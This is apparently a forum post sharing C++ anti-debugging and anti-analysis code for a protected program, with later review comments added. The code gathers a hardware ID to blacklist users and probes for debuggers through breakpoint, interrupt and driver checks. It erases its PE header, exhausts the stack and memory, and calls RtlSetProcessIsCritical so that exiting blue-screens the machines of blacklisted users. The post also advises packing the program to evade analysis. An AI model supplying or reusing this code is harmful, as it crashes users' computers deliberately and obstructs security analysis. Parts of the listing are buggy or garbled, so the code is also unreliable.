Get HWID:
Code:
// Builds the machine identifier used by the HWID check: a fixed prefix, the
// computer name and a value derived from the hardware-profile GUID, joined
// into the file-level UserCombineHWID string (UserComputerName and UserOsGUID
// are also file-level and are overwritten here).
// NOTE(review): none of the three Win32 calls has its return value checked, so
// on failure the identifier is assembled from uninitialised stack data.
void getHWID()
{
    // GetVolumeInformationA
    // Filled by the call below but never consumed: the to_string line is commented out.
    DWORD DriveSerial;
    // GetComputerNameA
    // NOTE(review): TCHAR is wchar_t in UNICODE builds, which would not match the
    // ANSI GetComputerNameA call — confirm the project is built without UNICODE.
    TCHAR ComputerName[MAX_COMPUTERNAME_LENGTH + 1];
    DWORD size = sizeof(ComputerName) / sizeof(ComputerName[0]);
    // OS GUID
    HW_PROFILE_INFO hwProfileInfo;
    DWORD OsGUID;
    // Root path 0 = current drive; volume-name buffer is nullptr with length '\0' (0),
    // so only the serial number is requested.
    GetVolumeInformationA(0, nullptr, '\0', &DriveSerial, nullptr, nullptr, nullptr, 0);
    GetComputerNameA(ComputerName, &size);
    GetCurrentHwProfileA(&hwProfileInfo);
    // NOTE(review): copies sizeof(szHwProfileGuid) bytes — the whole textual GUID
    // field of HW_PROFILE_INFO, far larger than four bytes — into a 4-byte DWORD.
    // That is a stack buffer overflow, and what ends up in OsGUID is the first four
    // characters of the GUID string, not a GUID.
    memcpy(&OsGUID, &hwProfileInfo.szHwProfileGuid, sizeof(hwProfileInfo.szHwProfileGuid));
    //UserDriveSerial = to_string(DriveSerial);
    UserComputerName = ComputerName;
    UserOsGUID = to_string(OsGUID);
    // Constant prefix mixed into the identifier before it is hashed by hash_str().
    string Messer = "2134[sl";
    UserCombineHWID = Messer + UserComputerName + UserOsGUID;
}
Hasher:
Code:
// Parameters of hash_str(): two multipliers, an optional modulus (only mentioned
// in a comment there) and the initial hash state. Typed constants rather than
// macros so they are scoped, type-checked and visible to the debugger.
constexpr int A = 54059;
constexpr int B = 45963;
constexpr int C = 86264;
constexpr int FIRSTH = 37;
using namespace std;
/// Multiply-and-XOR hash of a NUL-terminated string.
///
/// Starts from FIRSTH and, for each character, multiplies the running value by
/// A and XORs in the character scaled by B. Arithmetic is on `unsigned`, so
/// wrap-around is well defined. Note that the character is a plain `char`:
/// on platforms where `char` is signed, bytes >= 0x80 sign-extend before the
/// multiplication, so results for non-ASCII input are platform-dependent.
///
/// @param s  NUL-terminated input; must not be null.
/// @return   32-bit (unsigned) hash; the modulus C is deliberately not applied.
unsigned hash_str(const char* s)
{
    unsigned acc = FIRSTH;
    for (const char* p = s; *p != '\0'; ++p) {
        acc = (acc * A) ^ (*p * B);
    }
    return acc;
}
SelfDestruct (Need It For Anti Debug) :
Code:
// Deliberately exhausts process memory: allocates 10000-byte blocks in an
// unbounded loop and never frees them. This function has no normal return
// path; it ends only when an allocation throws (std::bad_alloc, not caught
// here) or the process is killed. From a defensive standpoint this is a local
// denial of service on the host — private bytes grow without bound — rather
// than a debugger check, and callers placed after it never run.
void SelfDestruct()
{
    std::vector<char*> explosion;
    while (true)
        explosion.push_back(new char[10000]);
}
Blue Screen (Need It For BlackListed Users):
Code:
// Marks the calling process as "critical" through the undocumented ntdll export
// RtlSetProcessIsCritical(New=1, Old=nullptr, NeedScb=0). Windows bug-checks
// (blue screens) when a critical process terminates, so any later exit of this
// process — including the exit(1) that follows it on the blacklist path — takes
// the whole machine down with it. The call is generally documented as requiring
// SeDebugPrivilege on the caller; its NTSTATUS is ignored here, so failure is
// silent. Resolving ntdll exports by name at run time is a common
// anti-analysis pattern and a useful detection signal for defenders.
void BSODBaby()
{
    typedef long (WINAPI *RtlSetProcessIsCritical)
        (BOOLEAN New, BOOLEAN *Old, BOOLEAN NeedScb);
    // ntdll is already mapped in every process; LoadLibraryA only bumps its reference count.
    auto ntdll = LoadLibraryA("ntdll.dll");
    if (ntdll) {
        // C-style cast from FARPROC to the typedef'd signature above.
        auto SetProcessIsCritical = (RtlSetProcessIsCritical)
            GetProcAddress(ntdll, "RtlSetProcessIsCritical");
        if (SetProcessIsCritical)
            SetProcessIsCritical(1, 0, 0);
    }
}
Debugger Checks:
Code:
// Five mutually recursive functions dispatched through a function-pointer table
// indexed with rand(). The indirection exists so the call graph is data-driven
// and random instead of visible as direct calls — a control-flow obfuscation
// aimed at analysts, not a correctness feature. Every recurseN below reads
// recfuncs, and none of them returns without making another such call, so once
// entered the group only ends via stack exhaustion.
// NOTE(review): identifiers beginning with an underscore at global scope
// (`_recurse`) are reserved by the C++ standard.
typedef void(*_recurse)();
void recurse1(); void recurse2();
void recurse3(); void recurse4();
void recurse5();
_recurse recfuncs[5] = {
    &recurse1, &recurse2, &recurse3,
    &recurse4, &recurse5
};
void recurse1() { recfuncs[rand() % 5](); }
void recurse2() { recfuncs[(rand() % 3) + 2](); }
// Half the time calls recurse1 directly; otherwise dispatches into
// recfuncs[1..3] (recurse2, recurse3 or recurse4). Both branches recurse, so
// there is no returning path.
void recurse3()
{
    if (rand() % 100 < 50) recurse1();
    else recfuncs[(rand() % 3) + 1]();
}
void recurse4() { recfuncs[rand() % 2](); }
// Runs 100 iterations, each with a 1-in-50 chance of dispatching into
// recfuncs[i % 5], then unconditionally calls itself. The self-call has no
// base case, so this recurses until the stack is exhausted (or spins forever
// if the compiler turns the tail call into a jump — behaviour depends on
// optimisation settings).
void recurse5()
{
    for (int i = 0; i < 100; i++)
        if (rand() % 50 == 1)
            recfuncs[i % 5]();
    recurse5();
}
// Reads the current thread's debug registers with GetThreadContext and reports
// whether any of DR0–DR3 (the four hardware-breakpoint address slots) is
// non-zero. Returns false if GetThreadContext itself fails. Requesting
// CONTEXT_DEBUG_REGISTERS on one's own thread is a textbook anti-debugging
// check and one of the API patterns analysis tooling flags.
// NOTE(review): the Win32 documentation says a context fetched for a running
// thread (here, the calling thread) is not guaranteed to be valid — confirm
// this is reliable enough for the intended use.
bool HasHardwareBreakpoints()
{
    CONTEXT ctx = { 0 };
    // NOTE(review): the member name is garbled in this listing; it is presumably
    // ctx.ContextFlags, which tells GetThreadContext which register groups to fill.
    ct*****ntextFlags = CONTEXT_DEBUG_REGISTERS;
    auto hThread = GetCurrentThread();
    if (GetThreadContext(hThread, &ctx) == 0)
        return false;
    return (ctx.Dr0 != 0 || ctx.Dr1 != 0 || ctx.Dr2 != 0 || ctx.Dr3 != 0);
}
// Probes for kernel-mode debugger drivers by opening their device names with
// CreateFileA; a handle other than INVALID_HANDLE_VALUE means the device (and
// so the driver) exists. The names are the legacy ring-0 debugger list that
// appears in many anti-debugging write-ups (SoftICE-era tools, TRW, Syser).
// Each table entry is a fixed 20-byte buffer and the empty string is the scan
// terminator, so it must remain the last element.
bool DebuggerDriversPresent()
{
    // an array of common debugger driver device names
    const char drivers[9][20] = {
        "\\\\.\\EXTREM", "\\\\.\\ICEEXT",
        "\\\\.\\NDBGMSG.VXD", "\\\\.\\RING0",
        "\\\\.\\SIWVID", "\\\\.\\SYSER",
        "\\\\.\\TRW", "\\\\.\\SYSERBOOT",
        "\0"
    };
    // Terminates on the "\0" sentinel, not on the array bound.
    for (int i = 0; drivers[i][0] != '\0'; i++) {
        // Desired access 0: the open only needs to succeed; nothing is read or written.
        auto h = CreateFileA(drivers[i], 0, 0, 0, OPEN_EXISTING, 0, 0);
        if (h != INVALID_HANDLE_VALUE)
        {
            // Release the handle before reporting; only the first hit is needed.
            CloseHandle(h);
            return true;
        }
    }
    return false;
}
// Exception-based anti-debug probe. Emits the raw bytes F3 64 F1 — REP and FS
// prefixes followed by the one-byte INT1 (ICEBP) opcode — inside a __try block.
// If the resulting exception is delivered to this process's own handler the
// function returns false ("no debugger"); if execution falls out of the __try
// body instead, i.e. the exception was consumed elsewhere (which the author
// attributes to an attached debugger), it returns true.
// MSVC-only: depends on structured exception handling and 32-bit __asm.
inline bool IsDbgPresentPrefixCheck()
{
    __try
    {
        __asm __emit 0xF3 // 0xF3 0x64 disassembles as PREFIX REP:
        __asm __emit 0x64
        __asm __emit 0xF1 // One byte INT 1
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        return false;
    }
    return true;
}
// INT 2D anti-debug probe. Executes the kernel debug-service interrupt and then
// a short xor/add sequence inside a __try block. In a stock process the
// interrupt raises an exception that reaches the __except handler, which
// returns false; returning true means the exception was absorbed by something
// other than this process. The trailing arithmetic is presumably padding for
// the well-known one-byte skip some debuggers apply after INT 2D — confirm.
// Has2DBreakpointHandler() below performs the same INT 2D probe without the
// padding. MSVC-only (__try / 32-bit __asm).
inline bool Int2DCheck()
{
    __try
    {
        __asm
        {
            int 0x2d
            xor eax, eax
            add eax, 2
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        return false;
    }
    return true;
}
// Minimal INT 2D probe: false if the interrupt's exception lands in our own
// __except handler, true if execution continues past it. Functionally a subset
// of Int2DCheck() (same interrupt, no trailing instructions). MSVC-only.
inline bool Has2DBreakpointHandler()
{
    __try { __asm INT 0x2D }
    __except (EXCEPTION_EXECUTE_HANDLER) { return false; }
    return true;
}
// INT 3 (software breakpoint) probe, same shape as Has2DBreakpointHandler():
// false when the breakpoint exception reaches this process's own handler,
// true when it was consumed elsewhere. MSVC-only.
inline bool Has03BreakpointHandler()
{
    __try { __asm INT 0x03 }
    __except (EXCEPTION_EXECUTE_HANDLER) { return false; }
    return true;
}
// Anti-dump measure: makes the first page of this module's image writable and
// zeroes it, destroying the in-memory DOS/NT headers so a dumped image is
// harder to reload. Points a maintainer or incident responder should know:
// the page size is hard-coded to 4096 (x86 assumption); VirtualProtect's
// return value is not checked, so ZeroMemory can fault if the protection
// change failed; and after this call anything that walks this module's headers
// at run time will presumably break — verify nothing in the process relies on them.
inline void ErasePEHeaderFromMemory()
{
    DWORD OldProtect = 0;
    // Get base address of module
    char *pBaseAddr = (char*)GetModuleHandle(NULL);
    // Change memory protection
    VirtualProtect(pBaseAddr, 4096, // Assume x86 page size
        PAGE_READWRITE, &OldProtect);
    // Erase the header
    ZeroMemory(pBaseAddr, 4096);
}
// Runs every probe defined above plus IsDebuggerPresent(); if any fires, runs
// the destructive response chain. Points a reviewer would raise as written:
//  - HasHardwareBreakpoints() appears twice in the condition; the second call is redundant.
//  - SelfDestruct() never returns (unbounded allocation loop), so the
//    OutputDebugString and exit(1) after it are unreachable.
//  - recurse1() also never returns normally, so SelfDestruct() is only reached
//    after the recursion chain has already exhausted the stack.
//  - "%s%s%s%s" is passed as the message itself; OutputDebugString does no
//    formatting, so the literal specifiers are emitted as-is. Presumably
//    deliberate — confirm the intent.
//  - DebugSelf() is commented out.
void CheckForDebuggers()
{
    if (HasHardwareBreakpoints() || DebuggerDriversPresent() || HasHardwareBreakpoints() || IsDbgPresentPrefixCheck() || Has2DBreakpointHandler() || Int2DCheck() || Has03BreakpointHandler() || IsDebuggerPresent())
    {
        ErasePEHeaderFromMemory();
        recurse1();
        //DebugSelf();
        SelfDestruct();
        OutputDebugString("%s%s%s%s");
        exit(1);
    }
}
How To Check HWID / BlackList People:
CheckForDebuggers() << Checks Debuggers
hash_str(UserCombineHWID.c_str()) << Hashes HWID
Code:
else if (hash_str(UserCombineHWID.c_str()) == <BlackListedShitters>)
{
BSODBaby();
recurse1();
SelfDestruct();
exit(1);
}
^^ BlackList Users ^^
Side Note:
- Pack It With Enigma (They make it so that the code also only be unpacked if called or almost being called ) ( Every packed things gets unpacked bits by bits while running in memory)
- Hardcoding The HWID Will Be Better As The Only Ways To Bypass The Anti Debuggers Methods Is By A Professional Or Emulator, So Hardcode Will Work Better
- This Is Not My Codes, Credits Goes To The Internet And Books I Read
Books To Read To Further Understand How This Works:
- Game Hacking
- Gray Hat Hacking - 4th Edition
- Hacking The Art Of Exploitation
Books Will Be Attached Below, Leave A Thanks If This Helped
Virus
htt ps:// ww w.virustotal. com/en/file/9c6d33333e98166b67b37c6e3ff48ffe8d25520e4968430bde c09be413ef9212/analysis/1499571729/
http s:// virusscan.jotti. org/en-GB/filescanjob/6xbtq0c3ig
I did not use some of the functions correctly (for example the fake exceptions); no time to fix it now, sorry.